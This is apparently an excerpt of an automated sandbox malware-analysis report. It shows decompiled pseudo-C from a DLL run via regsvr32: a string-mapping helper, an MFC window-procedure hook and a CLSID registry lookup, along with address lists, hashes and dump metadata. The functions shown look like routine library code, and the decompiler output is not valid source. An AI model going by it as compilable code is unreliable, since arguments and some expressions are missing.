				_t232 = _t231 - 0xa0;
				_t230 = _t232 + 0x40;
				 *((long long*)(_t230 + 0x58)) = __rbx;
				 *((long long*)(_t230 + 0x50)) = __rsi;
				 *((long long*)(_t230 + 0x48)) = __rdi;
				 *((long long*)(_t230 + 0x40)) = __r12;
				 *((long long*)(_t230 + 0x38)) = __r13;
				 *((long long*)(_t230 + 0x30)) = __r14;
				 *((long long*)(_t230 + 0x28)) = __r15;
				_t195 =  *0x1006f4c8; // 0x6f13091946cb
				_t196 = _t195 ^ _t230;
				 *(_t230 + 0x18) = _t196;
				r10d =  *0x10075be4; // 0x1
				_t144 = 0;
				_t259 = __r9;
				 *(_t230 + 8) = __r9;
				 *_t230 = r8d;
				r15d = __edx;
				 *(_t230 + 0x10) = __edx;
				_t220 = __rcx;
				if(r10d == 0) {
					_t12 = _t202 + 1; // 0x1
					r9d = _t12;
					_t145 = 0;
					 *(_t232 + 0x28) = 0;
					 *(_t232 + 0x20) = __rbx;
					if(LCMapStringW(??, ??, ??, ??, ??, ??) == 0) {
						GetLastError();
						r10d =  *0x10075be4; // 0x1
						_t145 = 2;
						r10d =  ==  ? 2 : r10d;
					} else {
						_t15 = _t202 + 1; // 0x1
						r10d = _t15;
					}
					 *0x10075be4 = r10d;
				}
				r9d =  *(_t230 + 0x90);
				if(r9d <= 0) {
					L13:
					if(r10d == 2 || r10d == 0) {
						_t253 = _t202;
						if(r15d == 0) {
							_t196 =  *_t220;
							r15d =  *(_t196 + 0x14);
							 *(_t230 + 0x10) = r15d;
						}
						_t170 =  *(_t230 + 0xa8);
						if(_t170 == 0) {
							_t196 =  *_t220;
							_t170 =  *(_t196 + 4);
						}
						_t145 = r15d;
						_t107 = E100506C0(_t246);
						r13d = _t107;
						if(_t107 != 0xffffffff) {
							_t234 = _t259;
							if(_t107 == _t170) {
								r9d =  *(_t230 + 0x90);
								 *(_t232 + 0x28) =  *(_t230 + 0xa0);
								_t145 = r15d;
								 *(_t232 + 0x20) =  *((intOrPtr*)(_t230 + 0x98));
								_t144 = LCMapStringA(??, ??, ??, ??, ??, ??);
								L84:
								goto L85;
							}
							_t145 = _t170;
							 *(_t232 + 0x28) = _t144;
							 *(_t232 + 0x20) = _t202;
							E10050730(_t170, _t107, _t170, _t202, _t220, _t227, _t234, _t230 + 0x90, _t250, _t251, _t253, _t256, _t259, _t263);
							_t261 = _t196;
							if(_t196 == 0) {
								goto L62;
							}
							r9d =  *(_t230 + 0x90);
							_t145 = r15d;
							 *(_t232 + 0x28) = _t144;
							 *(_t232 + 0x20) = _t202;
							_t114 = LCMapStringA(??, ??, ??, ??, ??, ??);
							_t265 =  *((intOrPtr*)(_t230 + 0x98));
							_t248 = _t114;
							 *(_t230 + 8) = r9d;
							if(_t114 <= 0) {
								L80:
								E10039620(_t196, _t261);
								if(_t253 != 0 && _t265 != _t253) {
									E10039620(_t196, _t253);
								}
								goto L84;
							}
							_t209 = _t248;
							if(_t248 > 0xffffffe0) {
								goto L80;
							}
							_t210 = _t209 + 0x10;
							if(_t210 > 0x400) {
								_t117 = E10039550(_t196, _t202, _t210, _t220, _t227);
								_t222 = _t196;
								if(_t196 == 0) {
									L75:
									r9d =  *(_t230 + 8);
									if(_t222 != 0) {
										E1003A240(_t117, _t145, 0, _t222, _t218, r9d);
										r11d =  *(_t230 + 8);
										r9d =  *(_t230 + 0x90);
										_t145 =  *(_t230 + 0x10);
										 *(_t232 + 0x28) = r11d;
										 *(_t232 + 0x20) = _t222;
										_t119 = LCMapStringA(??, ??, ??, ??, ??, ??);
										 *(_t230 + 8) = _t119;
										if(_t119 != 0) {
											 *(_t232 + 0x28) =  *(_t230 + 0xa0);
											 *(_t232 + 0x20) = _t265;
											E10050730(r13d, _t170, _t170, _t202, _t222, _t227, _t222, _t230 + 8, _t250, _t251, _t253, _t256, _t261, _t265);
											_t253 = _t196;
											_t145 =  ==  ? _t144 :  *(_t230 + 8);
											_t144 =  ==  ? _t144 :  *(_t230 + 8);
										}
										_t92 = _t222 - 0x10; // -16
										_t212 = _t92;
										if( *((intOrPtr*)(_t222 - 0x10)) == 0xdddd) {
											E10039620(_t196, _t212);
										}
									}
									goto L80;
								}
								 *_t196 = 0xdddd;
								L74:
								_t222 = _t222 + 0x10;
								goto L75;
							}
							_t223 = _t210 + 0xf;
							if(_t223 <= _t210) {
								_t223 = 0xfffffff0;
							}
							_t224 = _t223 & 0xfffffff0;
							_t196 = _t224;
							_t117 = E100534D0(_t114, _t196, _t250, _t251);
							_t232 = _t232 - _t224;
							_t222 = _t232 + 0x40;
							if(_t222 == 0) {
								goto L80;
							} else {
								 *_t222 = 0xcccc;
								goto L74;
							}
						} else {
							goto L62;
						}
					} else {
						if(r10d != 1) {
							L62:
							L85:
							return E10038D20(_t145,  *(_t230 + 0x18) ^ _t230);
						}
						r13d =  *(_t230 + 0xa8);
						r12d = _t144;
						if(r13d == 0) {
							r13d =  *( *_t220 + 4);
						}
						_t145 = r13d;
						_t158 =  !=  ? 9 : 1;
						 *(_t232 + 0x28) = _t144;
						 *(_t232 + 0x20) = _t202;
						_t124 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
						_t182 = _t124;
						_t262 = _t124;
						if(_t182 == 0 || _t182 <= 0) {
							goto L62;
						} else {
							_t198 = 0xffffffe0;
							_t125 = _t124 / _t262;
							if(0xffffffe0 < 2) {
								goto L62;
							}
							_t30 = _t262 + 0x10; // 0x30
							_t213 = _t262 + _t30;
							if(_t213 > 0x400) {
								E10039550(0xffffffe0, _t202, _t213, 0xfffffff0, _t227);
								_t229 = 0xffffffe0;
								if(0xffffffe0 == 0) {
									L29:
									if(_t229 == 0) {
										goto L62;
									}
									r9d =  *(_t230 + 0x90);
									_t145 = r13d;
									 *(_t232 + 0x28) = r14d;
									 *(_t232 + 0x20) = _t229;
									if(MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) {
										L54:
										_t64 = _t229 - 0x10; // -16
										_t214 = _t64;
										if( *((intOrPtr*)(_t229 - 0x10)) == 0xdddd) {
											E10039620(_t198, _t214);
										}
										goto L85;
									}
									r9d = r14d;
									_t145 = r15d;
									 *(_t232 + 0x28) = _t144;
									 *(_t232 + 0x20) = _t202;
									_t130 = LCMapStringW(??, ??, ??, ??, ??, ??);
									_t190 = _t130;
									_t255 = _t130;
									if(_t190 == 0) {
										goto L54;
									}
									_t145 =  *_t230;
									asm("bt ecx, 0xa");
									if(_t190 >= 0) {
										if(_t130 <= 0) {
											goto L54;
										}
										_t198 = 0xffffffe0;
										_t131 = _t130 / _t255;
										if(0xffffffe0 < 2) {
											goto L54;
										}
										_t48 = _t255 + 0x10; // 0x10
										_t215 = _t255 + _t48;
										if(_t215 > 0x400) {
											E10039550(0xffffffe0, _t202, _t215, 0xfffffff0, _t229);
											_t226 = 0xffffffe0;
											if(0xffffffe0 == 0) {
												L46:
												if(_t226 != 0) {
													r9d = r14d;
													_t145 = r15d;
													 *(_t232 + 0x28) = r12d;
													 *(_t232 + 0x20) = _t226;
													if(LCMapStringW(??, ??, ??, ??, ??, ??) != 0) {
														_t135 =  *(_t230 + 0xa0);
														 *(_t232 + 0x38) = _t202;
														r9d = r12d;
														_t145 = r13d;
														 *(_t232 + 0x30) = _t202;
														if(_t135 != 0) {
															 *(_t232 + 0x28) = _t135;
															_t198 =  *((intOrPtr*)(_t230 + 0x98));
															 *(_t232 + 0x20) =  *((intOrPtr*)(_t230 + 0x98));
														} else {
															 *(_t232 + 0x28) = _t144;
															 *(_t232 + 0x20) = _t202;
														}
														r12d = WideCharToMultiByte();
													}
													_t62 = _t226 - 0x10; // -16
													_t216 = _t62;
													if( *((intOrPtr*)(_t226 - 0x10)) == 0xdddd) {
														E10039620(_t198, _t216);
													}
												}
												goto L54;
											}
											 *0xffffffe0 = 0xdddd;
											L45:
											_t226 = _t226 + 0x10;
											goto L46;
										}
										_t49 = _t215 + 0xf; // 0x1f
										_t199 = _t49;
										if(_t199 <= _t215) {
											_t199 = 0xfffffff0;
										}
										_t198 = _t199 & 0xfffffff0;
										E100534D0(_t131, _t198, _t250, _t251);
										_t232 = _t232 - _t198;
										_t226 = _t232 + 0x40;
										if(_t226 == 0) {
											goto L54;
										} else {
											 *_t226 = 0xcccc;
											goto L45;
										}
									}
									_t138 =  *(_t230 + 0xa0);
									if(_t138 != 0 && r12d <= _t138) {
										 *(_t232 + 0x28) = _t138;
										_t198 =  *((intOrPtr*)(_t230 + 0x98));
										r9d = r14d;
										_t145 = r15d;
										 *(_t232 + 0x20) =  *((intOrPtr*)(_t230 + 0x98));
										LCMapStringW(??, ??, ??, ??, ??, ??);
									}
									goto L54;
								}
								 *0xffffffe0 = 0xdddd;
								L28:
								_t229 = _t229 + 0x10;
								goto L29;
							}
							_t31 = _t213 + 0xf; // 0x3f
							_t200 = _t31;
							if(_t200 <= _t213) {
								_t200 = 0xfffffff0;
							}
							_t198 = _t200 & 0xfffffff0;
							E100534D0(_t125, _t198, _t250, _t251);
							_t232 = _t232 - _t198;
							_t229 = _t232 + 0x40;
							if(_t229 == 0) {
								goto L62;
							} else {
								 *_t229 = 0xcccc;
								goto L28;
							}
						}
					}
				} else {
					_t141 = r9d;
					_t217 = _t259;
					while(1) {
						_t141 = _t141 - 1;
						if( *_t217 == _t144) {
							break;
						}
						_t217 = _t217 + 1;
						if(_t141 != 0) {
							continue;
						} else {
							_t141 = 0xffffffff;
							break;
						}
					}
					_t145 = r9d - _t141 - 1;
					if(_t145 >= r9d) {
						r9d = _t145;
						 *(_t230 + 0x90) = _t145;
					} else {
						r9d = _t217 + 1;
						 *(_t230 + 0x90) = r9d;
					}
					goto L13;
				}
			}




















































                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b970
                                                                              0x1004b972
                                                                              0x1004b979
                                                                              0x1004b97e
                                                                              0x1004b982
                                                                              0x1004b986
                                                                              0x1004b98a
                                                                              0x1004b98e
                                                                              0x1004b992
                                                                              0x1004b996
                                                                              0x1004b99a
                                                                              0x1004b9a1
                                                                              0x1004b9a4
                                                                              0x1004b9a8
                                                                              0x1004b9af
                                                                              0x1004b9b1
                                                                              0x1004b9b7
                                                                              0x1004b9bb
                                                                              0x1004b9bf
                                                                              0x1004b9c2
                                                                              0x1004b9c5
                                                                              0x1004b9c8
                                                                              0x1004b9ca
                                                                              0x1004b9ca
                                                                              0x1004b9da
                                                                              0x1004b9dc
                                                                              0x1004b9e0
                                                                              0x1004b9ed
                                                                              0x1004b9f5
                                                                              0x1004b9fb
                                                                              0x1004ba02
                                                                              0x1004ba0a
                                                                              0x1004b9ef
                                                                              0x1004b9ef
                                                                              0x1004b9ef
                                                                              0x1004b9ef
                                                                              0x1004ba0e
                                                                              0x1004ba0e
                                                                              0x1004ba15
                                                                              0x1004ba1f
                                                                              0x1004ba5e
                                                                              0x1004ba62
                                                                              0x1004bce5
                                                                              0x1004bce8
                                                                              0x1004bcea
                                                                              0x1004bced
                                                                              0x1004bcf1
                                                                              0x1004bcf1
                                                                              0x1004bcf5
                                                                              0x1004bcfd
                                                                              0x1004bcff
                                                                              0x1004bd02
                                                                              0x1004bd02
                                                                              0x1004bd05
                                                                              0x1004bd08
                                                                              0x1004bd10
                                                                              0x1004bd13
                                                                              0x1004bd1e
                                                                              0x1004bd21
                                                                              0x1004be89
                                                                              0x1004be93
                                                                              0x1004be9e
                                                                              0x1004bea1
                                                                              0x1004beac
                                                                              0x1004beae
                                                                              0x00000000
                                                                              0x1004beae
                                                                              0x1004bd30
                                                                              0x1004bd32
                                                                              0x1004bd36
                                                                              0x1004bd3b
                                                                              0x1004bd43
                                                                              0x1004bd46
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bd48
                                                                              0x1004bd55
                                                                              0x1004bd58
                                                                              0x1004bd5c
                                                                              0x1004bd61
                                                                              0x1004bd67
                                                                              0x1004bd70
                                                                              0x1004bd73
                                                                              0x1004bd77
                                                                              0x1004be67
                                                                              0x1004be6a
                                                                              0x1004be72
                                                                              0x1004be7c
                                                                              0x1004be7c
                                                                              0x00000000
                                                                              0x1004be72
                                                                              0x1004bd81
                                                                              0x1004bd84
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bd8a
                                                                              0x1004bd95
                                                                              0x1004bdcf
                                                                              0x1004bdd7
                                                                              0x1004bdda
                                                                              0x1004bde6
                                                                              0x1004bde9
                                                                              0x1004bded
                                                                              0x1004bdf7
                                                                              0x1004bdfc
                                                                              0x1004be00
                                                                              0x1004be0a
                                                                              0x1004be0d
                                                                              0x1004be15
                                                                              0x1004be1a
                                                                              0x1004be22
                                                                              0x1004be25
                                                                              0x1004be34
                                                                              0x1004be3d
                                                                              0x1004be42
                                                                              0x1004be4d
                                                                              0x1004be50
                                                                              0x1004be53
                                                                              0x1004be53
                                                                              0x1004be5c
                                                                              0x1004be5c
                                                                              0x1004be60
                                                                              0x1004be62
                                                                              0x1004be62
                                                                              0x1004be60
                                                                              0x00000000
                                                                              0x1004bded
                                                                              0x1004bddc
                                                                              0x1004bde2
                                                                              0x1004bde2
                                                                              0x00000000
                                                                              0x1004bde2
                                                                              0x1004bd97
                                                                              0x1004bd9e
                                                                              0x1004bda0
                                                                              0x1004bda0
                                                                              0x1004bdaa
                                                                              0x1004bdae
                                                                              0x1004bdb1
                                                                              0x1004bdb6
                                                                              0x1004bdb9
                                                                              0x1004bdc1
                                                                              0x00000000
                                                                              0x1004bdc7
                                                                              0x1004bdc7
                                                                              0x00000000
                                                                              0x1004bdc7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004ba71
                                                                              0x1004ba75
                                                                              0x1004bd15
                                                                              0x1004beb0
                                                                              0x1004bedd
                                                                              0x1004bedd
                                                                              0x1004ba7b
                                                                              0x1004ba82
                                                                              0x1004ba88
                                                                              0x1004ba8d
                                                                              0x1004ba8d
                                                                              0x1004baa4
                                                                              0x1004baa7
                                                                              0x1004baaa
                                                                              0x1004baae
                                                                              0x1004bab3
                                                                              0x1004bab9
                                                                              0x1004babb
                                                                              0x1004babe
                                                                              0x00000000
                                                                              0x1004baca
                                                                              0x1004bacc
                                                                              0x1004bad3
                                                                              0x1004bada
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bae0
                                                                              0x1004bae0
                                                                              0x1004baf6
                                                                              0x1004bb26
                                                                              0x1004bb2e
                                                                              0x1004bb31
                                                                              0x1004bb3d
                                                                              0x1004bb40
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bb46
                                                                              0x1004bb56
                                                                              0x1004bb59
                                                                              0x1004bb5e
                                                                              0x1004bb6b
                                                                              0x1004bcc8
                                                                              0x1004bccf
                                                                              0x1004bccf
                                                                              0x1004bcd3
                                                                              0x1004bcd5
                                                                              0x1004bcd5
                                                                              0x00000000
                                                                              0x1004bcda
                                                                              0x1004bb74
                                                                              0x1004bb7a
                                                                              0x1004bb7d
                                                                              0x1004bb81
                                                                              0x1004bb86
                                                                              0x1004bb8c
                                                                              0x1004bb8e
                                                                              0x1004bb91
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bb97
                                                                              0x1004bb9a
                                                                              0x1004bb9e
                                                                              0x1004bbdf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bbe7
                                                                              0x1004bbee
                                                                              0x1004bbf5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004bbfb
                                                                              0x1004bbfb
                                                                              0x1004bc07
                                                                              0x1004bc37
                                                                              0x1004bc3f
                                                                              0x1004bc42
                                                                              0x1004bc4e
                                                                              0x1004bc51
                                                                              0x1004bc56
                                                                              0x1004bc5c
                                                                              0x1004bc5f
                                                                              0x1004bc64
                                                                              0x1004bc71
                                                                              0x1004bc73
                                                                              0x1004bc7b
                                                                              0x1004bc82
                                                                              0x1004bc88
                                                                              0x1004bc8b
                                                                              0x1004bc90
                                                                              0x1004bc9d
                                                                              0x1004bca1
                                                                              0x1004bca8
                                                                              0x1004bc92
                                                                              0x1004bc92
                                                                              0x1004bc96
                                                                              0x1004bc96
                                                                              0x1004bcb3
                                                                              0x1004bcb3
                                                                              0x1004bcbd
                                                                              0x1004bcbd
                                                                              0x1004bcc1
                                                                              0x1004bcc3
                                                                              0x1004bcc3
                                                                              0x1004bcc1
                                                                              0x00000000
                                                                              0x1004bc51
                                                                              0x1004bc44
                                                                              0x1004bc4a
                                                                              0x1004bc4a
                                                                              0x00000000
                                                                              0x1004bc4a
                                                                              0x1004bc09
                                                                              0x1004bc09
                                                                              0x1004bc10
                                                                              0x1004bc12
                                                                              0x1004bc12
                                                                              0x1004bc15
                                                                              0x1004bc19
                                                                              0x1004bc1e
                                                                              0x1004bc21
                                                                              0x1004bc29
                                                                              0x00000000
                                                                              0x1004bc2f
                                                                              0x1004bc2f
                                                                              0x00000000
                                                                              0x1004bc2f
                                                                              0x1004bc29
                                                                              0x1004bba0
                                                                              0x1004bba8
                                                                              0x1004bbb7
                                                                              0x1004bbbb
                                                                              0x1004bbc4
                                                                              0x1004bbca
                                                                              0x1004bbcd
                                                                              0x1004bbd2
                                                                              0x1004bbd2
                                                                              0x00000000
                                                                              0x1004bba8
                                                                              0x1004bb33
                                                                              0x1004bb39
                                                                              0x1004bb39
                                                                              0x00000000
                                                                              0x1004bb39
                                                                              0x1004baf8
                                                                              0x1004baf8
                                                                              0x1004baff
                                                                              0x1004bb01
                                                                              0x1004bb01
                                                                              0x1004bb04
                                                                              0x1004bb08
                                                                              0x1004bb0d
                                                                              0x1004bb10
                                                                              0x1004bb18
                                                                              0x00000000
                                                                              0x1004bb1e
                                                                              0x1004bb1e
                                                                              0x00000000
                                                                              0x1004bb1e
                                                                              0x1004bb18
                                                                              0x1004babe
                                                                              0x1004ba21
                                                                              0x1004ba21
                                                                              0x1004ba24
                                                                              0x1004ba27
                                                                              0x1004ba27
                                                                              0x1004ba2c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004ba2e
                                                                              0x1004ba34
                                                                              0x00000000
                                                                              0x1004ba36
                                                                              0x1004ba36
                                                                              0x00000000
                                                                              0x1004ba36
                                                                              0x1004ba34
                                                                              0x1004ba40
                                                                              0x1004ba46
                                                                              0x1004ba55
                                                                              0x1004ba58
                                                                              0x1004ba48
                                                                              0x1004ba48
                                                                              0x1004ba4c
                                                                              0x1004ba4c
                                                                              0x00000000
                                                                              0x1004ba46

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1775797328-0
                                                                              • Opcode ID: 7c25a11eac3e5d3ef2ea4130d155b317aa90e246abb56c183bf9b5fde5d80954
                                                                              • Instruction ID: 9acc9dadcbc759e86774a4f3f65ad9739ff0a7c539647179966520f4a5d30794
                                                                              • Opcode Fuzzy Hash: 7c25a11eac3e5d3ef2ea4130d155b317aa90e246abb56c183bf9b5fde5d80954
                                                                              • Instruction Fuzzy Hash: 8BE19032700B808ADB25CF25E98079977E1F748BE8F614629EF5D97B98DB38DA50C704
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10013C24 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 63%
                                                                              			E10013C24(signed int __edx, void* __esi, void* __ebp, long long __rax, long long __rcx, long long __r8, long long __r9, void* __r10, void* __r11, long long _a8, signed int _a16, long long _a24, long long _a32) {
				char _v128;
				long long _v136;
				long long _v152;
				long long _v168;
				long _t18;
				signed short _t28;
				void* _t32;
				void* _t33;
				void* _t35;
				long _t37;
				long long _t44;
				long long _t46;
				long long _t72;

				_t44 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_v136 = 0xfffffffe;
				_t86 = __r9;
				r14d = __edx;
				_t72 = __rcx;
				GetPropW(??, ??);
				_v152 = __rax;
				_t7 = _t46 + 1; // 0x1
				_t37 = _t7;
				_t32 = r14d - 6;
				if(_t32 == 0) {
					E10011808(0, _t32, __rax, __r9, L"AfxOldWndProc423", __r8, __r9, __r11);
					E10011808(0, _t32, _t44, _t72, L"AfxOldWndProc423", __r8, __r9, __r11);
					_t18 = E10013B14(_t32, __esi, __eflags, _t44, _t44, __r8, _t44, __r11);
					goto L8;
				} else {
					_t33 = _t32 - 0x1a;
					if(_t33 == 0) {
						E10011808(0, _t33, __rax, __rcx, L"AfxOldWndProc423", __r8, __r9, __r11);
						r8d = _t28 & 0x0000ffff;
						_t18 = E10013BA0(0, r13w, __esi, _t44, _t44, L"AfxOldWndProc423", __r8, __r9, __r11);
						_t37 = 0;
						__eflags = _t18;
						dil = _t18 == 0;
						L8:
						__eflags = _t37;
						if(_t37 != 0) {
							goto L9;
						}
					} else {
						_t35 = _t33 - 0x62;
						if(_t35 == 0) {
							__imp__SetWindowLongPtrW();
							RemovePropW(??, ??);
							GlobalFindAtomW(??);
							GlobalDeleteAtom(??);
							goto L9;
						} else {
							_t43 = _t35 - 0x8e;
							if(_t35 != 0x8e) {
								L9:
								_v168 = _t86;
								r8d = r14d;
								_t18 = CallWindowProcW(??, ??, ??, ??, ??);
								_t46 = _t44;
							} else {
								E10011808(0, _t35, __rax, __rcx, L"AfxOldWndProc423", __r8, __r9, __r11);
								GetWindowRect(??, ??);
								r12d = E10016020(_t44);
								_v168 = __r9;
								r8d = 0x110;
								CallWindowProcW(??, ??, ??, ??, ??);
								_t46 = _t44;
								r8d = r12d;
								_t18 = E100121F8(0, _t35, __ebp, _t43, _t44, _t44,  &_v128, __r8, __r8, __r10, __r11);
							}
						}
					}
				}
				return _t18;
			}
















                                                                              0x10013c24
                                                                              0x10013c24
                                                                              0x10013c29
                                                                              0x10013c2e
                                                                              0x10013c32
                                                                              0x10013c49
                                                                              0x10013c52
                                                                              0x10013c58
                                                                              0x10013c5b
                                                                              0x10013c65
                                                                              0x10013c6e
                                                                              0x10013c75
                                                                              0x10013c75
                                                                              0x10013c7b
                                                                              0x10013c7e
                                                                              0x10013d5c
                                                                              0x10013d67
                                                                              0x10013d75
                                                                              0x00000000
                                                                              0x10013c84
                                                                              0x10013c84
                                                                              0x10013c87
                                                                              0x10013d33
                                                                              0x10013d3f
                                                                              0x10013d4a
                                                                              0x10013d4f
                                                                              0x10013d51
                                                                              0x10013d53
                                                                              0x10013d7f
                                                                              0x10013d7f
                                                                              0x10013d81
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10013c8d
                                                                              0x10013c8d
                                                                              0x10013c90
                                                                              0x10013d02
                                                                              0x10013d12
                                                                              0x10013d1f
                                                                              0x10013d28
                                                                              0x00000000
                                                                              0x10013c92
                                                                              0x10013c92
                                                                              0x10013c98
                                                                              0x10013d83
                                                                              0x10013d83
                                                                              0x10013d8b
                                                                              0x10013d94
                                                                              0x10013d9a
                                                                              0x10013c9e
                                                                              0x10013ca1
                                                                              0x10013cb2
                                                                              0x10013cc0
                                                                              0x10013cc3
                                                                              0x10013ccb
                                                                              0x10013cd9
                                                                              0x10013cdf
                                                                              0x10013ce2
                                                                              0x10013ced
                                                                              0x10013ced
                                                                              0x10013c98
                                                                              0x10013c90
                                                                              0x10013c87
                                                                              0x10013db9

                                                                              APIs
                                                                              • GetPropW.USER32 ref: 10013C65
                                                                              • GetWindowRect.USER32 ref: 10013CB2
                                                                                • Part of subcall function 10016020: GetWindowLongW.USER32 ref: 10016037
                                                                              • CallWindowProcW.USER32 ref: 10013CD9
                                                                                • Part of subcall function 100121F8: GetWindowRect.USER32 ref: 10012224
                                                                                • Part of subcall function 100121F8: GetWindow.USER32 ref: 10012246
                                                                              • SetWindowLongPtrW.USER32 ref: 10013D02
                                                                              • RemovePropW.USER32 ref: 10013D12
                                                                              • GlobalFindAtomW.KERNEL32 ref: 10013D1F
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 10013D28
                                                                              • CallWindowProcW.USER32 ref: 10013D94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AtomCallGlobalLongProcPropRect$DeleteFindRemove
                                                                              • String ID: AfxOldWndProc423
                                                                              • API String ID: 186092411-1060338832
                                                                              • Opcode ID: 28288d54de551d1b90b963cc208d11c1d8fcdc6bdae86f614acb6e1ff45899ac
                                                                              • Instruction ID: f2614e1a69e09393a53a32394ae46be562b16ba832b899f902482d70a7e2ee7a
                                                                              • Opcode Fuzzy Hash: 28288d54de551d1b90b963cc208d11c1d8fcdc6bdae86f614acb6e1ff45899ac
                                                                              • Instruction Fuzzy Hash: CA31D23571465042DB11DB16BC443AE67A1F78AFE4F008225ED9A0FB64DF7CC5CA8B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002FF00 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 83registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 31%
                                                                              			E1002FF00(intOrPtr* __rcx, intOrPtr* __rdx, void* __rdi, long long __rsi, void* __rbp, void* __r8, void* __r11, char _a16, char _a24, long long _a32) {
				char _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				signed int _v200;
				long long _v1232;
				long long _v1248;
				void* __rbx;
				signed int _t43;
				void* _t48;
				signed int _t49;
				intOrPtr _t81;
				signed long long _t82;
				intOrPtr* _t87;
				intOrPtr* _t88;
				long long* _t89;
				intOrPtr _t92;
				long long* _t96;
				intOrPtr* _t111;
				intOrPtr* _t114;
				intOrPtr* _t117;
				long long _t121;
				intOrPtr _t122;
				long long _t126;
				void* _t129;
				void* _t130;
				void* _t131;
				char* _t137;
				char* _t140;
				void* _t142;

				_t142 = __r11;
				_t121 = __rsi;
				_push(__rsi);
				_push(__rdi);
				_t130 = _t129 - 0x48;
				_t80 =  *__rdx;
				_v48 = 0;
				_t2 = _t121 + 1; // 0x1
				r8d = _t2;
				_t87 = __rdx;
				r8d = r8d -  *((intOrPtr*)(_t80 - 8));
				_t117 = __rcx;
				r8d = r8d |  *((intOrPtr*)(_t80 - 0xc)) - 0x00000104;
				if(r8d < 0) {
					E10009920(0x104, __rdx, __rcx, __r8);
				}
				_t126 =  *_t87;
				_t137 =  &_v48;
				_t111 = L"CLSID";
				_a16 = 0x208;
				_a24 = 0;
				if(RegOpenKeyW(??, ??, ??) == 0) {
					_t137 =  &_v56;
					_t111 = _t117;
					_v56 = _t121;
					if(RegOpenKeyW(??, ??, ??) == 0) {
						_t137 =  &_a32;
						_t111 = L"InProcServer32";
						_a32 = _t121;
						if(RegOpenKeyW(??, ??, ??) == 0) {
							_t80 =  &_a16;
							_t140 =  &_a24;
							_v64 =  &_a16;
							_t111 = 0x100577b8;
							r8d = 0;
							_v72 = _t126;
							sil = RegQueryValueExW(??, ??, ??, ??, ??, ??) == 0;
							RegCloseKey(??);
						}
						RegCloseKey();
					}
					_t42 = RegCloseKey();
				}
				_t92 =  *_t87;
				if(_t92 != 0) {
					_t43 = E10039820(_t42, _t92);
					if(_t43 < 0) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t43 = 0;
					L11:
					_t92 =  *_t87;
					if(_t43 >  *((intOrPtr*)(_t92 - 0xc))) {
						L13:
						E10009538(0x80070057, 0x104, _t80, _t87, _t92, _t111, _t117, _t137, _t140, _t142);
						asm("int3");
						_push(_t87);
						_push(_t126);
						_push(_t121);
						_push(_t117);
						_t131 = _t130 - 0x28;
						_t81 =  *_t111;
						r8d = 1;
						r8d = r8d -  *((intOrPtr*)(_t81 - 8));
						_t88 = _t111;
						_t46 =  *((intOrPtr*)(_t81 - 0xc)) - 0x104;
						_t122 = _t92;
						r8d = r8d |  *((intOrPtr*)(_t81 - 0xc)) - 0x00000104;
						if(r8d < 0) {
							_t46 = E10009920(0x104, _t88, _t117, _t137);
						}
						_t118 =  *_t88;
